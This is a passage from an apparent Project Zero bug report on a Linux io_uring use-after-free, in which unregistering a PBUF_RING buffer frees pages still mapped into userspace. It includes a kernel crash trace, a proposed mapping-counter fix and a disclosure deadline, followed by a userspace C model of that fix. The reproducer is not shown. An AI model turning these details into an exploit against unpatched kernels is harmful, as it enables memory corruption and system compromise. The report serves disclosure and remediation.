  CONFIG_PAGE_TABLE_CHECK_ENFORCED=y

, this will splat with the following error, when __page_table_check_zero()
detects that a page that's being freed is still mapped into userspace:

==============================================================
------------[ cut here ]------------
kernel BUG at mm/page_table_check.c:146!
invalid opcode: 0000 [#1] PREEMPT SMP KASAN
CPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:__page_table_check_zero+0x136/0x150
Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ff
RSP: 0018:ffff888029aa7c70 EFLAGS: 00010202
RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000
RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4
RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13e
R10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000
R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000
FS:  00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0
PKRU: 55555554
Call Trace:
 <TASK>
[...]
 free_unref_page_prepare+0x282/0x450
 free_unref_page+0x45/0x170
 __io_remove_buffers.part.0+0x38c/0x3c0
 io_unregister_pbuf_ring+0x146/0x1e0
[...]
 __do_sys_io_uring_register+0xa03/0x11c0
[...]
 do_syscall_64+0x43/0xf0
 entry_SYSCALL_64_after_hwframe+0x6e/0x76
RIP: 0033:0x7f745ef4bf59
Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48
RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59
RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003
RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000
R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0
R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000
 </TASK>
Modules linked in:
---[ end trace 0000000000000000 ]---
==============================================================

When run on a system without those options, this reproducer will randomly
corrupt memory and probably on most runs crash the machine.
I tried it once and after I tried using some other programs, I got some random
kernel #GP fault.


One way to fix this might be to add some mapping counter to
`struct io_buffer_list`, and then:

 - increment that counter in io_uring_validate_mmap_request() for PBUF_RING
   mappings
 - increment that counter in the vm_area_operations ->open() handler
 - decrement that counter in the vm_area_operations ->close() handler
 - refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?

Or alternatively free the io_buffer_list when the counter drops to zero, and let
the counter start at 1.

(I'm not sure what the lifetime rules for other accesses to the io_buffer_list's
memory are - it looks like most paths only access the io_buffer_list under some
lock? Is the idea that the kernel actually accesses the buffer through userspace
pointers, or something like that? I'll have to stare at this some more before I
understand it...)


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-02-26.




Found by: jannh@google.com

</code></pre>
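The mapping-counter scheme sketched in the report, modelled in userspace as an added example (this is not kernel code and not the report's own): a buffer ring owns its pages, every VMA that maps them takes a reference through the mmap path and the ->open() hook and drops it in ->close(), and unregister refuses with -EBUSY while the count is non-zero. Only `struct io_buffer_list`, the IORING_*_PBUF_RING operations and the vm_operations hooks are named in the report; the function and field names below are this model's assumptions.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Model of the io_uring side: the ring's pages plus the proposed mapping counter. */
struct io_buffer_list {
    unsigned bgid;
    unsigned char *ring_pages;   /* stands in for the kernel pages backing the ring */
    int mapping_count;           /* VMAs currently mapping ring_pages */
};

/* Model of one userspace VMA that maps the ring (VM_PFNMAP in the real kernel). */
struct vma {
    struct io_buffer_list *bl;
};

/* IORING_REGISTER_PBUF_RING with IOU_PBUF_RING_MMAP: the kernel allocates the pages. */
struct io_buffer_list *pbuf_ring_register(unsigned bgid, size_t size) {
    struct io_buffer_list *bl = calloc(1, sizeof *bl);
    if (!bl) return NULL;
    bl->bgid = bgid;
    bl->ring_pages = calloc(1, size);
    if (!bl->ring_pages) { free(bl); return NULL; }
    return bl;
}

/* io_uring_validate_mmap_request(): an mmap() at IORING_OFF_PBUF_RING takes a reference. */
int pbuf_ring_mmap(struct io_buffer_list *bl, struct vma *v) {
    if (!bl || !bl->ring_pages) return -EINVAL;
    bl->mapping_count++;
    v->bl = bl;
    return 0;
}

/* vm_ops->open(): the VMA was duplicated (fork, split), so another holder now exists. */
void pbuf_vma_open(const struct vma *src, struct vma *dst) {
    dst->bl = src->bl;
    dst->bl->mapping_count++;
}

/* vm_ops->close(): munmap() or process exit tears the VMA down. */
void pbuf_vma_close(struct vma *v) {
    v->bl->mapping_count--;
    v->bl = NULL;
}

/* IORING_UNREGISTER_PBUF_RING with the check the report says is missing. */
int pbuf_ring_unregister(struct io_buffer_list **blp) {
    struct io_buffer_list *bl = *blp;
    if (!bl) return -ENOENT;
    if (bl->mapping_count > 0)
        return -EBUSY;           /* still mapped into userspace: the pages must outlive the VMA */
    free(bl->ring_pages);
    free(bl);
    *blp = NULL;
    return 0;
}

/* The reproducer's sequence: register, mmap, unregister while still mapped, keep writing.
 * Returns the unregister result seen while mapped (-EBUSY), or -1 if cleanup misbehaves. */
int scenario_unregister_while_mapped(void) {
    struct io_buffer_list *bl = pbuf_ring_register(0, 0x1000);
    struct vma v = { 0 };
    int rc;
    if (!bl || pbuf_ring_mmap(bl, &v) != 0) return -1;
    rc = pbuf_ring_unregister(&bl);
    if (!bl) return -1;                     /* must not have been freed */
    memset(bl->ring_pages, 0xaa, 0x1000);   /* the reproducer's write now lands on live pages */
    pbuf_vma_close(&v);
    if (pbuf_ring_unregister(&bl) != 0) return -1;   /* unmapped: release is allowed now */
    return rc;
}

/* Why ->open() must count too: after fork() the child still maps the pages when the
 * parent unmaps. Returns the unregister result at that point (-EBUSY), or -1 on error. */
int scenario_fork_then_parent_unmaps(void) {
    struct io_buffer_list *bl = pbuf_ring_register(0, 0x1000);
    struct vma parent = { 0 }, child = { 0 };
    int rc;
    if (!bl || pbuf_ring_mmap(bl, &parent) != 0) return -1;
    pbuf_vma_open(&parent, &child);     /* fork() duplicates the VMA */
    pbuf_vma_close(&parent);            /* parent munmap()s; count is still 1 */
    rc = pbuf_ring_unregister(&bl);
    if (!bl) return -1;
    pbuf_vma_close(&child);
    if (pbuf_ring_unregister(&bl) != 0) return -1;
    return rc;
}
```

The report's alternative (start the counter at 1, have unregister drop that reference, and free when it reaches zero) differs only in `pbuf_ring_unregister` and `pbuf_vma_close`: the last holder, whichever it is, performs the free.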